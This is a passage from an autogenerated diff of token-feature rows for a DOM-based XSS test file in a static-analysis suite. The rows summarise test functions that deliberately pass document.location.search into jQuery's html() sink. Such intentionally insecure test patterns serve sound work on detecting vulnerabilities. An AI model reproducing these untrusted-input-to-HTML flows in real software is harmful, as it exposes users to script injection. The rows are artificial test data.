element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17380,6 +120878,107 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:377:47:377:49 | "?" | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | | autogenerated/Xss/DomBasedXss/tst.js:377:47:377:49 | "?" | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:377:47:377:49 | "?" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:377:52:377:52 | 0 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:377:52:377:52 | 0 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:377:52:377:52 | 0 | enclosingFunctionBody | target document location search $ myId html target $ myid html document 0 location href split ? 0 | +| autogenerated/Xss/DomBasedXss/tst.js:377:52:377:52 | 0 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:377:52:377:52 | 0 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:380:1:380:0 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:380:1:380:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:380:1:380:0 | this | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:380:1:380:0 | this | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:380:1:380:0 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:380:1:413:1 | 'arguments' object of function test | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:380:1:413:1 | 'arguments' object of function test | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:380:1:413:1 | 'arguments' object of function test | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:380:1:413:1 | 'arguments' object of function test | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:380:1:413:1 | 'arguments' object of function test | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:380:1:413:1 | exceptional return of function test | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:380:1:413:1 | exceptional return of function test | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:380:1:413:1 | exceptional return of function test | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:380:1:413:1 | exceptional return of function test | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:380:1:413:1 | exceptional return of function test | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:380:1:413:1 | functio ... // OK\\n} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:380:1:413:1 | functio ... // OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:380:1:413:1 | functio ... // OK\\n} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:380:1:413:1 | return of function test | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:380:1:413:1 | return of function test | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:380:1:413:1 | return of function test | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:380:1:413:1 | return of function test | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:380:1:413:1 | return of function test | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:380:10:380:13 | test | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:380:10:380:13 | test | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:380:10:380:13 | test | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:381:7:381:12 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:381:7:381:12 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:381:7:381:12 | target | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:381:7:381:12 | target | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:381:7:381:12 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:381:7:381:39 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:381:7:381:39 | target | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:381:7:381:39 | target | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:381:7:381:39 | target | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:381:7:381:39 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:381:7:381:39 | target ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:381:7:381:39 | target ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:381:7:381:39 | target ... .search | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:381:7:381:39 | target ... .search | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:381:7:381:39 | target ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:381:16:381:23 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:381:16:381:23 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:381:16:381:23 | document | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:381:16:381:23 | document | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:381:16:381:23 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:381:16:381:32 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:381:16:381:32 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:381:16:381:32 | document.location | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:381:16:381:32 | document.location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:381:16:381:32 | document.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:381:16:381:39 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:381:16:381:39 | documen ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:381:16:381:39 | documen ... .search | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:381:16:381:39 | documen ... .search | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:381:16:381:39 | documen ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:381:25:381:32 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:381:25:381:32 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:381:25:381:32 | location | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:381:25:381:32 | location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:381:25:381:32 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:381:34:381:39 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:381:34:381:39 | search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:381:34:381:39 | search | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:381:34:381:39 | search | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:381:34:381:39 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:384:3:384:3 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:384:3:384:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:384:3:384:3 | $ | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:384:3:384:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:384:3:384:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:384:3:384:11 | $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:384:3:384:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:384:3:384:11 | $('myId') | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:384:3:384:11 | $('myId') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:384:3:384:11 | $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:384:3:384:11 | exceptional return of $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:384:3:384:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:384:3:384:11 | exceptional return of $('myId') | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:384:3:384:11 | exceptional return of $('myId') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:384:3:384:11 | exceptional return of $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:384:3:384:16 | $('myId').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:384:3:384:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:384:3:384:16 | $('myId').html | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:384:3:384:16 | $('myId').html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:384:3:384:16 | $('myId').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:384:3:384:24 | $('myId ... target) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:384:3:384:24 | $('myId ... target) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:384:3:384:24 | 